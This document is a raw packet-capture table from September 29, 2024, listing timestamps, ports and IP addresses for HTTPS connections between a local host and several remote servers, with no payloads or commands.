                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.017487049 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.031263113 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.032094002 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.064268112 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090142965 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090147018 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090477943 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090534925 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090692997 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.090724945 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.091208935 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.091681957 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.091941118 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.091953993 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.092015982 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.092617035 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.092628956 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.092866898 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.092907906 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.093281031 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.093334913 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.094064951 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.094193935 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.094300032 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.094753981 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.094938040 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.096545935 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.096621037 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.096748114 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.096817017 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.097157001 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.097194910 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.097242117 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.097544909 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.097758055 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.098057032 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.098251104 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.098397017 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.098999977 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099153996 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099191904 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099447966 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099456072 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099584103 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099783897 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.099790096 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.100097895 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.100131989 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.139478922 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.143414021 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.143431902 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.151675940 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.151787996 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.151834965 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.200073004 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.200104952 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.200182915 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.200622082 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.200638056 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.204680920 CEST49772443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.204730988 CEST44349772157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282273054 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282350063 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282383919 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282485962 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282562017 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282578945 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282715082 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.282845974 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.283092976 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.283183098 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.283191919 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284028053 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284104109 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284149885 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284398079 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284409046 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284471035 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.284486055 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.288140059 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.288227081 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.288254976 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.288378954 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.288434029 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289448023 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289459944 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289500952 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289515018 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289530039 CEST44349773157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.289588928 CEST49773443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.295556068 CEST49775443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.295583963 CEST44349775157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.296957016 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.296986103 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297022104 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297044992 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297070026 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297076941 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297132969 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297132969 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297141075 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297199965 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.297285080 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.302654982 CEST49776443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.302668095 CEST44349776157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.303843021 CEST49779443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.303847075 CEST44349779157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.338542938 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381387949 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381397009 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381414890 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381422997 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381448030 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381511927 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381535053 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.381565094 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.401704073 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.401777029 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.401878119 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.401902914 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.401920080 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.402004004 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.402055025 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411490917 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411498070 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411509991 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411526918 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411544085 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411571026 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411573887 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411602020 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.411637068 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473872900 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473881006 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473890066 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473901033 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473941088 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473942995 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473957062 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.473989010 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.474014997 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.474030018 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.474059105 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.474117041 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.485539913 CEST49777443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.485578060 CEST44349777157.240.0.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.486109972 CEST49774443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.486140966 CEST44349774157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.558003902 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.558057070 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.558298111 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.559899092 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.559911013 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.563891888 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.563915968 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.563987970 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565037012 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565080881 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565139055 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565710068 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565777063 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.565846920 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.566622019 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.566647053 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.566714048 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.567171097 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.567184925 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.567266941 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570319891 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570332050 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570698023 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570724964 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570921898 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.570940971 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.571335077 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.571351051 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.571508884 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.571516991 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.831036091 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.839616060 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.839631081 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.840981960 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.842784882 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.842972994 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.843264103 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:19.887398005 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.102858067 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.102976084 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.102994919 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103755951 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103816032 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103826046 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103866100 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103926897 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.103972912 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.188779116 CEST49780443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.188798904 CEST44349780157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.201412916 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.202255964 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.202327013 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.202655077 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.203577995 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.203653097 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.204176903 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.209328890 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.210144043 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.210802078 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.210819960 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.211247921 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.211270094 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.211282969 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.212398052 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.212702990 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.212770939 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.219183922 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.219316959 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.220022917 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.220129013 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.220628023 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.220643997 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.220645905 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221175909 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221184969 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221319914 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221685886 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221833944 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.221860886 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222259998 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222275019 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222290039 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222337961 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222357035 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.222412109 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.223298073 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.223356962 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.223507881 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.223604918 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.224257946 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.224313021 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225032091 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225097895 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225809097 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225825071 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225910902 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.225917101 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.226003885 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.226015091 CEST44349784157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.251419067 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.263417006 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.301089048 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.301170111 CEST49783443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.301175117 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.353625059 CEST49784443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.473329067 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.473437071 CEST49787443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.473495960 CEST44349787157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483412981 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483568907 CEST49786443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.483587027 CEST44349786157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.484610081 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.484680891 CEST49785443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.484690905 CEST44349785157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487004995 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487082958 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487138033 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487165928 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487210035 CEST49782443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.487226963 CEST44349782157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.488869905 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.488902092 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.496191978 CEST44349783157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:20.496254921 CEST49783443192.168.2.4157.240.251.9
